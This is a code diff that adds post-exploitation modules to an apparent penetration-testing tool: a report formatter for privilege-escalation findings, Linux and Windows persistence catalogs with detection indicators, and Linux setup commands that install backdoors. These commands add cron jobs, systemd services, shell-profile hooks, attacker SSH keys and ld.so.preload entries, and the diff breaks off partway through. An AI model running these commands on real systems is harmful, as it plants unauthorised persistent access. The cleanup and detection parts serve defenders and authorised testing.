+    if (result.systemInfo.osVersion) lines.push(`  OS: ${result.systemInfo.osVersion}`)
+    if (result.systemInfo.currentUser) lines.push(`  User: ${result.systemInfo.currentUser}`)
+    lines.push(`  Admin: ${result.systemInfo.isAdmin ? "Yes" : "No"}`)
+    lines.push(`  UAC: ${result.systemInfo.uacEnabled ? "Enabled" : "Disabled"}`)
+    lines.push("")
+
+    // Token Privileges
+    const exploitableTokens = result.tokenPrivileges.filter(p => p.exploitable)
+    if (exploitableTokens.length > 0) {
+      lines.push("[EXPLOITABLE TOKEN PRIVILEGES]")
+      for (const priv of exploitableTokens) {
+        lines.push(`  [!] ${priv.privilege}`)
+        if (priv.technique) lines.push(`      Technique: ${priv.technique}`)
+      }
+      lines.push("")
+    }
+
+    // Critical Registry Findings
+    const criticalRegistry = result.registryFindings.filter(r => r.significance === "critical")
+    if (criticalRegistry.length > 0) {
+      lines.push("[CRITICAL REGISTRY FINDINGS]")
+      for (const reg of criticalRegistry) {
+        lines.push(`  [!] ${reg.type}: ${reg.key}`)
+      }
+      lines.push("")
+    }
+
+    // Unquoted Paths
+    const exploitableUnquoted = result.unquotedPaths.filter(u => u.exploitable)
+    if (exploitableUnquoted.length > 0) {
+      lines.push("[EXPLOITABLE UNQUOTED PATHS]")
+      for (const unquoted of exploitableUnquoted) {
+        lines.push(`  [!] Service: ${unquoted.service}`)
+        lines.push(`      Path: ${unquoted.path}`)
+        lines.push(`      Hijack points: ${unquoted.writableSegments.join(", ")}`)
+      }
+      lines.push("")
+    }
+
+    // Modifiable Services
+    const modifiableServices = result.services.filter(s => s.modifiableBinary)
+    if (modifiableServices.length > 0) {
+      lines.push("[MODIFIABLE SERVICE BINARIES]")
+      for (const svc of modifiableServices) {
+        lines.push(`  [!] ${svc.name}: ${svc.path}`)
+      }
+      lines.push("")
+    }
+
+    // Writable Scheduled Tasks
+    const writableTasks = result.scheduledTasks.filter(t => t.writable)
+    if (writableTasks.length > 0) {
+      lines.push("[WRITABLE SCHEDULED TASKS]")
+      for (const task of writableTasks) {
+        lines.push(`  [!] ${task.name} (runs as ${task.runsAs})`)
+        if (task.command) lines.push(`      Command: ${task.command}`)
+      }
+      lines.push("")
+    }
+
+    // Credentials
+    if (result.credentials.length > 0) {
+      lines.push("[CREDENTIAL FINDINGS]")
+      for (const cred of result.credentials.slice(0, 10)) {
+        lines.push(`  [*] ${cred.source} (${cred.type})`)
+        if (cred.username) lines.push(`      User: ${cred.username}`)
+        lines.push(`      ${cred.content.substring(0, 60)}...`)
+      }
+      if (result.credentials.length > 10) {
+        lines.push(`  ... and ${result.credentials.length - 10} more`)
+      }
+      lines.push("")
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/persistence/catalog.ts b/packages/opencode/src/pentest/postexploit/persistence/catalog.ts
new file mode 100644
index 00000000000..3b94c78c863
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/persistence/catalog.ts
@@ -0,0 +1,456 @@
+/**
+ * @fileoverview Persistence Mechanism Catalog
+ *
+ * Catalog of persistence mechanisms for both Linux and Windows platforms
+ * with detection information and cleanup guidance.
+ *
+ * @module pentest/postexploit/persistence/catalog
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Persistence mechanism catalog namespace.
+ */
+export namespace PersistenceCatalog {
+  /**
+   * Persistence mechanism template.
+   */
+  interface MechanismTemplate {
+    name: string
+    description: string
+    privilege: "user" | "admin" | "system"
+    survival: PostExploitTypes.Survival
+    detectionRisk: PostExploitTypes.DetectionRisk
+    indicators: string[]
+    mitre: string[]
+  }
+
+  /**
+   * Linux persistence mechanisms catalog.
+   */
+  export const LINUX_MECHANISMS: Record<PostExploitTypes.LinuxPersistenceCategory, MechanismTemplate> = {
+    cron: {
+      name: "Cron Job",
+      description: "Scheduled task via crontab",
+      privilege: "user",
+      survival: "reboot",
+      detectionRisk: "medium",
+      indicators: [
+        "New crontab entries",
+        "Modified /etc/crontab",
+        "Files in /etc/cron.d/",
+        "Process cron executing commands",
+      ],
+      mitre: [PostExploitTypes.MITRE_PERSIST.CRON],
+    },
+    systemd: {
+      name: "Systemd Service",
+      description: "Systemd unit file for persistence",
+      privilege: "admin",
+      survival: "reboot",
+      detectionRisk: "medium",
+      indicators: [
+        "New .service files in /etc/systemd/system/",
+        "User services in ~/.config/systemd/user/",
+        "systemctl daemon-reload execution",
+        "Unusual service enabled",
+      ],
+      mitre: [PostExploitTypes.MITRE_PERSIST.SYSTEMD],
+    },
+    init: {
+      name: "Init Scripts",
+      description: "SysV init scripts",
+      privilege: "admin",
+      survival: "reboot",
+      detectionRisk: "medium",
+      indicators: [
+        "New scripts in /etc/init.d/",
+        "Modified rc.local",
+        "Unusual runlevel symlinks",
+      ],
+      mitre: [PostExploitTypes.MITRE_PERSIST.RC_SCRIPTS],
+    },
+    shell_profile: {
+      name: "Shell Profile",
+      description: "Backdoor in shell profile scripts",
+      privilege: "user",
+      survival: "logout",
+      detectionRisk: "low",
+      indicators: [
+        "Modified ~/.bashrc, ~/.profile, ~/.bash_profile",
+        "Modified /etc/profile, /etc/bash.bashrc",
+        "Unusual commands in profile files",
+      ],
+      mitre: [PostExploitTypes.MITRE_PERSIST.SHELL_PROFILE],
+    },
+    ssh_authorized_keys: {
+      name: "SSH Authorized Keys",
+      description: "Add attacker's SSH public key",
+      privilege: "user",
+      survival: "reboot",
+      detectionRisk: "low",
+      indicators: [
+        "New entries in ~/.ssh/authorized_keys",
+        "Unusual key comments",
+        "Keys for unexpected users",
+      ],
+      mitre: [PostExploitTypes.MITRE_PERSIST.SSH_AUTHORIZED_KEYS],
+    },
+    ld_preload: {
+      name: "LD_PRELOAD",
+      description: "Library preload hijacking",
+      privilege: "admin",
+      survival: "reboot",
+      detectionRisk: "medium",
+      indicators: [
+        "/etc/ld.so.preload modifications",
+        "LD_PRELOAD environment variable",
+        "Unusual shared libraries loaded",
+      ],
+      mitre: ["T1574.006"],
+    },
+    pam: {
+      name: "PAM Backdoor",
+      description: "Modified PAM module for authentication bypass",
+      privilege: "admin",
+      survival: "reboot",
+      detectionRisk: "low",
+      indicators: [
+        "Modified files in /etc/pam.d/",
+        "Unusual PAM modules in /lib/security/",
+        "Authentication succeeding with any password",
+      ],
+      mitre: ["T1556.003"],
+    },
+    at_job: {
+      name: "At Job",
+      description: "One-time scheduled task",
+      privilege: "user",
+      survival: "reboot",
+      detectionRisk: "medium",
+      indicators: [
+        "atq shows pending jobs",
+        "Files in /var/spool/at/",
+      ],
+      mitre: ["T1053.002"],
+    },
+    kernel_module: {
+      name: "Kernel Module",
+      description: "Malicious kernel module (rootkit)",
+      privilege: "admin",
+      survival: "reboot",
+      detectionRisk: "low",
+      indicators: [
+        "lsmod shows unknown modules",
+        "Files in /lib/modules/",
+        "Modified module loading config",
+      ],
+      mitre: ["T1547.006"],
+    },
+    rc_local: {
+      name: "RC Local",
+      description: "Commands in /etc/rc.local",
+      privilege: "admin",
+      survival: "reboot",
+      detectionRisk: "medium",
+      indicators: [
+        "Modified /etc/rc.local",
+        "rc.local executing at boot",
+      ],
+      mitre: [PostExploitTypes.MITRE_PERSIST.RC_SCRIPTS],
+    },
+    motd: {
+      name: "MOTD Scripts",
+      description: "Backdoor in message of the day scripts",
+      privilege: "admin",
+      survival: "logout",
+      detectionRisk: "low",
+      indicators: [
+        "Modified files in /etc/update-motd.d/",
+        "Executable scripts in motd directories",
+      ],
+      mitre: ["T1037"],
+    },
+    apt_hook: {
+      name: "APT Hook",
+      description: "Backdoor via APT package manager hook",
+      privilege: "admin",
+      survival: "service_restart",
+      detectionRisk: "low",
+      indicators: [
+        "Files in /etc/apt/apt.conf.d/",
+        "Pre/Post invoke commands in APT config",
+      ],
+      mitre: ["T1546"],
+    },
+  }
+
+  /**
+   * Windows persistence mechanisms catalog.
+   */
+  export const WINDOWS_MECHANISMS: Record<PostExploitTypes.WindowsPersistenceCategory, MechanismTemplate> = {
+    registry_run: {
+      name: "Registry Run Keys",
+      description: "Autostart via registry Run/RunOnce keys",
+      privilege: "user",
+      survival: "reboot",
+      detectionRisk: "high",
+      indicators: [
+        "New entries in HKCU/HKLM\\...\\Run",
+        "Registry modifications logged in Sysmon",
+        "Autoruns tool detection",
+      ],
+      mitre: [PostExploitTypes.MITRE_PERSIST.REGISTRY_RUN],
+    },
+    registry_services: {
+      name: "Registry Services",
+      description: "Service persistence via registry",
+      privilege: "admin",
+      survival: "reboot",
+      detectionRisk: "medium",
+      indicators: [
+        "New service registry keys",
+        "Modified ImagePath values",
+        "Service configuration changes",
+      ],
+      mitre: [PostExploitTypes.MITRE_PERSIST.SERVICE],
+    },
+    scheduled_task: {
+      name: "Scheduled Task",
+      description: "Windows Task Scheduler persistence",
+      privilege: "user",
+      survival: "reboot",
+      detectionRisk: "high",
+      indicators: [
+        "New tasks in Task Scheduler",
+        "Task XML files created",
+        "Event ID 4698 (task created)",
+      ],
+      mitre: [PostExploitTypes.MITRE_PERSIST.SCHEDULED_TASK],
+    },
+    wmi_subscription: {
+      name: "WMI Event Subscription",
+      description: "Persistence via WMI permanent event subscription",
+      privilege: "admin",
+      survival: "reboot",
+      detectionRisk: "low",
+      indicators: [
+        "WMI filter/consumer/binding objects",
+        "__EventFilter instances",
+        "CommandLineEventConsumer instances",
+      ],
+      mitre: [PostExploitTypes.MITRE_PERSIST.WMI_EVENT],
+    },
+    service: {
+      name: "Windows Service",
+      description: "Install malicious service",
+      privilege: "admin",
+      survival: "reboot",
+      detectionRisk: "high",
+      indicators: [
+        "New service registered",
+        "Service binary in unusual location",
+        "Event ID 7045 (service installed)",
+      ],
+      mitre: [PostExploitTypes.MITRE_PERSIST.SERVICE],
+    },
+    dll_hijack: {
+      name: "DLL Hijacking",
+      description: "DLL search order hijacking",
+      privilege: "user",
+      survival: "service_restart",
+      detectionRisk: "low",
+      indicators: [
+        "DLL in unusual location",
+        "Process loading DLL from writable path",
+        "Modified legitimate applications",
+      ],
+      mitre: ["T1574.001"],
+    },
+    com_hijack: {
+      name: "COM Hijacking",
+      description: "Hijack COM object registration",
+      privilege: "user",
+      survival: "service_restart",
+      detectionRisk: "low",
+      indicators: [
+        "Modified CLSID registry keys",
+        "InprocServer32 pointing to unusual DLL",
+        "HKCU COM object overrides",
+      ],
+      mitre: ["T1546.015"],
+    },
+    startup_folder: {
+      name: "Startup Folder",
+      description: "Shortcut in Startup folder",
+      privilege: "user",
+      survival: "reboot",
+      detectionRisk: "high",
+      indicators: [
+        "New files in Startup folder",
+        "LNK files pointing to unusual locations",
+        "Shell:startup enumeration",
+      ],
+      mitre: [PostExploitTypes.MITRE_PERSIST.STARTUP_FOLDER],
+    },
+    logon_script: {
+      name: "Logon Script",
+      description: "User/computer logon script",
+      privilege: "admin",
+      survival: "logout",
+      detectionRisk: "medium",
+      indicators: [
+        "UserInitMprLogonScript registry value",
+        "GPO logon script assignment",
+        "Modified NETLOGON scripts",
+      ],
+      mitre: [PostExploitTypes.MITRE_PERSIST.LOGON_SCRIPT],
+    },
+    bitsadmin: {
+      name: "BITS Job",
+      description: "Background Intelligent Transfer Service persistence",
+      privilege: "user",
+      survival: "reboot",
+      detectionRisk: "medium",
+      indicators: [
+        "Persistent BITS jobs",
+        "bitsadmin /list shows jobs",
+        "Unusual download/execute behavior",
+      ],
+      mitre: ["T1197"],
+    },
+    image_hijack: {
+      name: "Image File Execution Options",
+      description: "Debugger persistence via IFEO",
+      privilege: "admin",
+      survival: "service_restart",
+      detectionRisk: "low",
+      indicators: [
+        "IFEO registry key modifications",
+        "Debugger value pointing to payload",
+        "GlobalFlag or SilentProcessExit abuse",
+      ],
+      mitre: ["T1546.012"],
+    },
+    accessibility_features: {
+      name: "Accessibility Features",
+      description: "Replace accessibility binaries (sethc, utilman)",
+      privilege: "admin",
+      survival: "reboot",
+      detectionRisk: "medium",
+      indicators: [
+        "Modified sethc.exe, utilman.exe, osk.exe",
+        "Hash mismatch on accessibility tools",
+        "IFEO debugger on accessibility tools",
+      ],
+      mitre: ["T1546.008"],
+    },
+    appinit_dlls: {
+      name: "AppInit DLLs",
+      description: "DLL loaded into all user-mode processes",
+      privilege: "admin",
+      survival: "reboot",
+      detectionRisk: "medium",
+      indicators: [
+        "AppInit_DLLs registry value",
+        "LoadAppInit_DLLs enabled",
+        "DLL in unusual location",
+      ],
+      mitre: ["T1546.010"],
+    },
+    winlogon: {
+      name: "Winlogon",
+      description: "Winlogon helper DLL/process persistence",
+      privilege: "admin",
+      survival: "logout",
+      detectionRisk: "low",
+      indicators: [
+        "Modified Userinit, Shell, or Notify values",
+        "Custom winlogon notification package",
+        "Unusual DLLs loaded by winlogon",
+      ],
+      mitre: ["T1547.004"],
+    },
+  }
+
+  /**
+   * Get all mechanisms for a platform.
+   */
+  export function getMechanisms(
+    platform: PostExploitTypes.Platform
+  ): { category: string; mechanism: MechanismTemplate }[] {
+    const mechanisms = platform === "linux" ? LINUX_MECHANISMS : WINDOWS_MECHANISMS
+    return Object.entries(mechanisms).map(([category, mechanism]) => ({
+      category,
+      mechanism,
+    }))
+  }
+
+  /**
+   * Get mechanisms filtered by privilege level.
+   */
+  export function getMechanismsByPrivilege(
+    platform: PostExploitTypes.Platform,
+    privilege: "user" | "admin" | "system"
+  ): { category: string; mechanism: MechanismTemplate }[] {
+    const all = getMechanisms(platform)
+    const privilegeOrder = { user: 0, admin: 1, system: 2 }
+
+    return all.filter(m =>
+      privilegeOrder[m.mechanism.privilege] <= privilegeOrder[privilege]
+    )
+  }
+
+  /**
+   * Get mechanisms filtered by detection risk.
+   */
+  export function getMechanismsByDetection(
+    platform: PostExploitTypes.Platform,
+    maxRisk: PostExploitTypes.DetectionRisk
+  ): { category: string; mechanism: MechanismTemplate }[] {
+    const all = getMechanisms(platform)
+    const riskOrder = { low: 0, medium: 1, high: 2 }
+
+    return all.filter(m =>
+      riskOrder[m.mechanism.detectionRisk] <= riskOrder[maxRisk]
+    )
+  }
+
+  /**
+   * Format mechanism catalog for display.
+   */
+  export function formatCatalog(platform: PostExploitTypes.Platform): string {
+    const lines: string[] = []
+    const mechanisms = getMechanisms(platform)
+
+    lines.push(`${platform.toUpperCase()} PERSISTENCE MECHANISMS`)
+    lines.push("=".repeat(50))
+    lines.push("")
+
+    // Group by privilege
+    const byPrivilege = {
+      user: mechanisms.filter(m => m.mechanism.privilege === "user"),
+      admin: mechanisms.filter(m => m.mechanism.privilege === "admin"),
+      system: mechanisms.filter(m => m.mechanism.privilege === "system"),
+    }
+
+    for (const [priv, mechs] of Object.entries(byPrivilege)) {
+      if (mechs.length === 0) continue
+
+      lines.push(`[${priv.toUpperCase()} LEVEL]`)
+      for (const { category, mechanism } of mechs) {
+        const detection = mechanism.detectionRisk === "low" ? "+" :
+                          mechanism.detectionRisk === "medium" ? "o" : "-"
+        lines.push(`  ${detection} ${mechanism.name} (${category})`)
+        lines.push(`    Survives: ${mechanism.survival}`)
+        lines.push(`    Detection: ${mechanism.detectionRisk}`)
+      }
+      lines.push("")
+    }
+
+    lines.push("Legend: + = low detection, o = medium, - = high detection")
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/persistence/index.ts b/packages/opencode/src/pentest/postexploit/persistence/index.ts
new file mode 100644
index 00000000000..bb65f018104
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/persistence/index.ts
@@ -0,0 +1,266 @@
+/**
+ * @fileoverview Persistence Module
+ *
+ * Exports for persistence mechanism catalog and platform-specific guidance.
+ *
+ * @module pentest/postexploit/persistence
+ */
+
+export { PersistenceCatalog } from "./catalog"
+export { LinuxPersistence } from "./linux"
+export { WindowsPersistence } from "./windows"
+
+import { PersistenceCatalog } from "./catalog"
+import { LinuxPersistence } from "./linux"
+import { WindowsPersistence } from "./windows"
+import { PostExploitTypes } from "../types"
+
+/**
+ * Unified persistence interface.
+ */
+export namespace Persistence {
+  /**
+   * Get all persistence mechanisms for a platform.
+   */
+  export function getCatalog(platform: PostExploitTypes.Platform): string {
+    return PersistenceCatalog.formatCatalog(platform)
+  }
+
+  /**
+   * Get mechanisms filtered by criteria.
+   * Returns flat PersistenceMechanism objects.
+   */
+  export function getMechanisms(
+    platform: PostExploitTypes.Platform,
+    filters?: {
+      privilege?: "user" | "admin" | "system"
+      maxDetection?: PostExploitTypes.DetectionRisk
+    }
+  ): Omit<PostExploitTypes.PersistenceMechanism, "id" | "catalogedAt">[] {
+    let catalogMechanisms = PersistenceCatalog.getMechanisms(platform)
+
+    if (filters?.privilege) {
+      catalogMechanisms = PersistenceCatalog.getMechanismsByPrivilege(platform, filters.privilege)
+    }
+
+    if (filters?.maxDetection) {
+      const riskOrder = { low: 0, medium: 1, high: 2 }
+      catalogMechanisms = catalogMechanisms.filter(m =>
+        riskOrder[m.mechanism.detectionRisk] <= riskOrder[filters.maxDetection!]
+      )
+    }
+
+    // Flatten to PersistenceMechanism objects
+    return catalogMechanisms.map(({ category, mechanism }) => ({
+      category: category as PostExploitTypes.PersistenceCategory,
+      platform,
+      name: mechanism.name,
+      description: mechanism.description,
+      location: getDefaultLocation(platform, category),
+      privilege: mechanism.privilege,
+      survival: mechanism.survival,
+      detectionRisk: mechanism.detectionRisk,
+      commands: getDefaultCommands(platform, category),
+      cleanup: getDefaultCleanup(platform, category),
+      indicators: mechanism.indicators,
+      mitre: mechanism.mitre,
+    }))
+  }
+
+  /**
+   * Get default location for a persistence mechanism.
+   */
+  function getDefaultLocation(platform: PostExploitTypes.Platform, category: string): string {
+    if (platform === "linux") {
+      const locations: Record<string, string> = {
+        cron: "/etc/crontab, /etc/cron.d/, /var/spool/cron/",
+        systemd: "/etc/systemd/system/, ~/.config/systemd/user/",
+        shell_profile: "~/.bashrc, ~/.profile, /etc/profile.d/",
+        ssh_authorized_keys: "~/.ssh/authorized_keys",
+        ld_preload: "/etc/ld.so.preload",
+        pam: "/etc/pam.d/",
+        rc_local: "/etc/rc.local",
+        init_d: "/etc/init.d/",
+        motd: "/etc/update-motd.d/",
+        git_hooks: ".git/hooks/",
+        kernel_module: "/lib/modules/",
+        udev: "/etc/udev/rules.d/",
+      }
+      return locations[category] || "system-specific"
+    } else {
+      const locations: Record<string, string> = {
+        registry_run: "HKLM/HKCU\\...\\Run",
+        scheduled_task: "Task Scheduler",
+        service: "services.msc",
+        wmi_subscription: "WMI Repository",
+        startup_folder: "%APPDATA%\\...\\Startup",
+        dll_hijack: "Application directories",
+        com_hijack: "HKCU\\Software\\Classes\\CLSID\\",
+        bitsadmin: "BITS Jobs",
+        print_monitor: "HKLM\\SYSTEM\\...\\Print\\Monitors\\",
+        security_support_provider: "HKLM\\SYSTEM\\...\\Lsa\\Security Packages",
+        netsh_helper: "HKLM\\SOFTWARE\\Microsoft\\NetSh",
+        appinit_dll: "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows",
+      }
+      return locations[category] || "system-specific"
+    }
+  }
+
+  /**
+   * Get default setup commands for a persistence mechanism.
+   */
+  function getDefaultCommands(platform: PostExploitTypes.Platform, category: string): string[] {
+    const commands = getMechanismCommands(platform, category)
+    return commands.setup.length > 0 ? commands.setup : ["See documentation for setup commands"]
+  }
+
+  /**
+   * Get default cleanup commands for a persistence mechanism.
+   */
+  function getDefaultCleanup(platform: PostExploitTypes.Platform, category: string): string[] {
+    const commands = getMechanismCommands(platform, category)
+    return commands.cleanup.length > 0 ? commands.cleanup : ["See documentation for cleanup commands"]
+  }
+
+  /**
+   * Get platform-specific guidance.
+   */
+  export function getGuidance(platform: PostExploitTypes.Platform): string {
+    if (platform === "linux") {
+      return LinuxPersistence.formatGuidance()
+    } else {
+      return WindowsPersistence.formatGuidance()
+    }
+  }
+
+  /**
+   * Create a persistence mechanism entry.
+   */
+  export function createMechanism(
+    platform: PostExploitTypes.Platform,
+    category: PostExploitTypes.PersistenceCategory,
+    location: string,
+    options?: {
+      name?: string
+      description?: string
+    }
+  ): Omit<PostExploitTypes.PersistenceMechanism, "id" | "catalogedAt"> {
+    if (platform === "linux") {
+      return LinuxPersistence.createMechanism(
+        category as PostExploitTypes.LinuxPersistenceCategory,
+        location,
+        options
+      )
+    } else {
+      return WindowsPersistence.createMechanism(
+        category as PostExploitTypes.WindowsPersistenceCategory,
+        location,
+        options
+      )
+    }
+  }
+
+  /**
+   * Get commands for a specific mechanism type.
+   */
+  export function getMechanismCommands(
+    platform: PostExploitTypes.Platform,
+    category: string
+  ): { setup: string[]; cleanup: string[]; detection: string[] } {
+    if (platform === "linux") {
+      switch (category) {
+        case "cron": return LinuxPersistence.getCronCommands()
+        case "systemd": return LinuxPersistence.getSystemdCommands()
+        case "shell_profile": return LinuxPersistence.getShellProfileCommands()
+        case "ssh_authorized_keys": return LinuxPersistence.getSSHKeysCommands()
+        case "ld_preload": return LinuxPersistence.getLDPreloadCommands()
+        default: return { setup: [], cleanup: [], detection: [] }
+      }
+    } else {
+      switch (category) {
+        case "registry_run": return WindowsPersistence.getRegistryRunCommands()
+        case "scheduled_task": return WindowsPersistence.getScheduledTaskCommands()
+        case "service": return WindowsPersistence.getServiceCommands()
+        case "wmi_subscription": return WindowsPersistence.getWMICommands()
+        case "startup_folder": return WindowsPersistence.getStartupFolderCommands()
+        default: return { setup: [], cleanup: [], detection: [] }
+      }
+    }
+  }
+
+  /**
+   * Get recommended persistence mechanisms.
+   */
+  export function getRecommendations(
+    platform: PostExploitTypes.Platform,
+    context: {
+      privilege: "user" | "admin"
+      stealth: boolean
+    }
+  ): string[] {
+    const recommendations: string[] = []
+
+    if (platform === "linux") {
+      if (context.stealth) {
+        recommendations.push("ssh_authorized_keys - Low detection, survives reboot")
+        if (context.privilege === "admin") {
+          recommendations.push("pam - Very low detection, authentication backdoor")
+        }
+      } else {
+        recommendations.push("cron - Reliable, easy to implement")
+        if (context.privilege === "admin") {
+          recommendations.push("systemd - Modern, robust persistence")
+        }
+      }
+    } else {
+      if (context.stealth) {
+        recommendations.push("com_hijack - Low detection, user level")
+        if (context.privilege === "admin") {
+          recommendations.push("wmi_subscription - Low detection, powerful")
+        }
+      } else {
+        recommendations.push("scheduled_task - Flexible, well-supported")
+        if (context.privilege === "admin") {
+          recommendations.push("service - Reliable, runs as SYSTEM")
+        }
+      }
+    }
+
+    return recommendations
+  }
+
+  /**
+   * Format mechanisms for display.
+   * Accepts either just mechanisms or both platform and mechanisms for compatibility.
+   * Also accepts partial mechanisms (without id/catalogedAt) for convenience.
+   */
+  export function formatMechanisms(
+    platformOrMechanisms: PostExploitTypes.Platform | PostExploitTypes.PersistenceMechanism[] | Omit<PostExploitTypes.PersistenceMechanism, "id" | "catalogedAt">[],
+    maybeMechanisms?: PostExploitTypes.PersistenceMechanism[] | Omit<PostExploitTypes.PersistenceMechanism, "id" | "catalogedAt">[]
+  ): string {
+    // Handle both calling conventions
+    const mechanisms = Array.isArray(platformOrMechanisms) ? platformOrMechanisms : maybeMechanisms || []
+
+    if (mechanisms.length === 0) {
+      return "No persistence mechanisms cataloged."
+    }
+
+    const lines: string[] = []
+    lines.push(`Cataloged ${mechanisms.length} persistence mechanism(s):`)
+    lines.push("")
+
+    for (const mech of mechanisms) {
+      const detection = mech.detectionRisk === "low" ? "[+]" :
+                        mech.detectionRisk === "medium" ? "[o]" : "[-]"
+      lines.push(`${detection} ${mech.name} (${mech.category})`)
+      lines.push(`    Location: ${mech.location}`)
+      lines.push(`    Privilege: ${mech.privilege} | Survives: ${mech.survival}`)
+      lines.push(`    MITRE: ${mech.mitre.join(", ")}`)
+      lines.push("")
+    }
+
+    lines.push("Legend: [+] low detection, [o] medium, [-] high detection")
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/persistence/linux.ts b/packages/opencode/src/pentest/postexploit/persistence/linux.ts
new file mode 100644
index 00000000000..7cbcf38eece
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/persistence/linux.ts
@@ -0,0 +1,431 @@
+/**
+ * @fileoverview Linux Persistence Guidance
+ *
+ * Provides guidance for Linux persistence mechanisms including
+ * cron, systemd, shell profiles, SSH keys, and more.
+ *
+ * @module pentest/postexploit/persistence/linux
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Linux persistence guidance namespace.
+ */
+export namespace LinuxPersistence {
+  /**
+   * Get cron persistence commands.
+   */
+  export function getCronCommands(): {
+    setup: string[]
+    cleanup: string[]
+    detection: string[]
+  } {
+    return {
+      setup: [
+        "# User crontab persistence",
+        "crontab -l > /tmp/cron.bak",
+        "echo '* * * * * /path/to/payload' >> /tmp/cron.bak",
+        "crontab /tmp/cron.bak",
+        "rm /tmp/cron.bak",
+        "",
+        "# System cron.d (requires root)",
+        "echo '* * * * * root /path/to/payload' > /etc/cron.d/update",
+        "",
+        "# Modify existing cron job",
+        "# Find writable cron scripts and append payload",
+      ],
+      cleanup: [
+        "# Remove user crontab entry",
+        "crontab -l | grep -v 'payload' | crontab -",
+        "",
+        "# Remove system cron file",
+        "rm /etc/cron.d/<file>",
+        "",
+        "# Restore original crontab",
+        "crontab /path/to/backup",
+      ],
+      detection: [
+        "crontab -l",
+        "cat /etc/crontab",
+        "ls -la /etc/cron.*",
+        "cat /var/log/cron.log",
+      ],
+    }
+  }
+
+  /**
+   * Get systemd service persistence commands.
+   */
+  export function getSystemdCommands(): {
+    setup: string[]
+    cleanup: string[]
+    detection: string[]
+  } {
+    return {
+      setup: [
+        "# System service (requires root)",
+        "cat > /etc/systemd/system/update.service << 'EOF'",
+        "[Unit]",
+        "Description=System Update Service",
+        "",
+        "[Service]",
+        "Type=simple",
+        "ExecStart=/path/to/payload",
+        "Restart=always",
+        "RestartSec=60",
+        "",
+        "[Install]",
+        "WantedBy=multi-user.target",
+        "EOF",
+        "",
+        "systemctl daemon-reload",
+        "systemctl enable update.service",
+        "systemctl start update.service",
+        "",
+        "# User service (no root required)",
+        "mkdir -p ~/.config/systemd/user",
+        "cat > ~/.config/systemd/user/update.service << 'EOF'",
+        "[Unit]",
+        "Description=User Update Service",
+        "",
+        "[Service]",
+        "Type=simple",
+        "ExecStart=/path/to/payload",
+        "Restart=always",
+        "",
+        "[Install]",
+        "WantedBy=default.target",
+        "EOF",
+        "",
+        "systemctl --user daemon-reload",
+        "systemctl --user enable update.service",
+      ],
+      cleanup: [
+        "# System service cleanup",
+        "systemctl stop update.service",
+        "systemctl disable update.service",
+        "rm /etc/systemd/system/update.service",
+        "systemctl daemon-reload",
+        "",
+        "# User service cleanup",
+        "systemctl --user stop update.service",
+        "systemctl --user disable update.service",
+        "rm ~/.config/systemd/user/update.service",
+        "systemctl --user daemon-reload",
+      ],
+      detection: [
+        "systemctl list-units --type=service",
+        "systemctl list-unit-files",
+        "ls -la /etc/systemd/system/",
+        "ls -la ~/.config/systemd/user/",
+      ],
+    }
+  }
+
+  /**
+   * Get shell profile persistence commands.
+   */
+  export function getShellProfileCommands(): {
+    setup: string[]
+    cleanup: string[]
+    detection: string[]
+  } {
+    return {
+      setup: [
+        "# User bashrc",
+        "echo '/path/to/payload &' >> ~/.bashrc",
+        "",
+        "# User profile (login shells)",
+        "echo '/path/to/payload &' >> ~/.profile",
+        "",
+        "# System-wide (requires root)",
+        "echo '/path/to/payload &' >> /etc/bash.bashrc",
+        "echo '/path/to/payload &' >> /etc/profile",
+        "",
+        "# Zsh users",
+        "echo '/path/to/payload &' >> ~/.zshrc",
+        "",
+        "# More stealthy - add to existing function",
+        "# Find a function in bashrc and append payload call",
+      ],
+      cleanup: [
+        "# Remove added lines",
+        "sed -i '/payload/d' ~/.bashrc",
+        "sed -i '/payload/d' ~/.profile",
+        "sed -i '/payload/d' /etc/bash.bashrc",
+        "sed -i '/payload/d' /etc/profile",
+      ],
+      detection: [
+        "cat ~/.bashrc ~/.profile ~/.bash_profile",
+        "cat /etc/bash.bashrc /etc/profile",
+        "diff ~/.bashrc /etc/skel/.bashrc",
+      ],
+    }
+  }
+
+  /**
+   * Get SSH authorized_keys persistence commands.
+   */
+  export function getSSHKeysCommands(): {
+    setup: string[]
+    cleanup: string[]
+    detection: string[]
+  } {
+    return {
+      setup: [
+        "# Add attacker's public key",
+        "mkdir -p ~/.ssh",
+        "chmod 700 ~/.ssh",
+        'echo "ssh-rsa AAAA... attacker@host" >> ~/.ssh/authorized_keys',
+        "chmod 600 ~/.ssh/authorized_keys",
+        "",
+        "# For root access (requires root)",
+        "mkdir -p /root/.ssh",
+        "chmod 700 /root/.ssh",
+        'echo "ssh-rsa AAAA... attacker@host" >> /root/.ssh/authorized_keys',
+        "chmod 600 /root/.ssh/authorized_keys",
+        "",
+        "# Add with command restriction (stealthier)",
+        'echo \'command="/path/to/script",no-port-forwarding,no-X11-forwarding ssh-rsa AAAA...\' >> ~/.ssh/authorized_keys',
+      ],
+      cleanup: [
+        "# Remove specific key",
+        "sed -i '/attacker@host/d' ~/.ssh/authorized_keys",
+        "",
+        "# Restore original",
+        "cp ~/.ssh/authorized_keys.bak ~/.ssh/authorized_keys",
+      ],
+      detection: [
+        "cat ~/.ssh/authorized_keys",
+        "cat /root/.ssh/authorized_keys",
+        "find / -name 'authorized_keys' 2>/dev/null",
+        'grep -r "ssh-rsa" /home/',
+      ],
+    }
+  }
+
+  /**
+   * Get LD_PRELOAD persistence commands.
+   */
+  export function getLDPreloadCommands(): {
+    setup: string[]
+    cleanup: string[]
+    detection: string[]
+  } {
+    return {
+      setup: [
+        "# /etc/ld.so.preload (requires root)",
+        "echo '/path/to/malicious.so' >> /etc/ld.so.preload",
+        "",
+        "# Environment variable (user level)",
+        "echo 'export LD_PRELOAD=/path/to/malicious.so' >> ~/.bashrc",
+        "",
+        "# Create malicious shared library",
+        "# Compile C code that hooks functions",
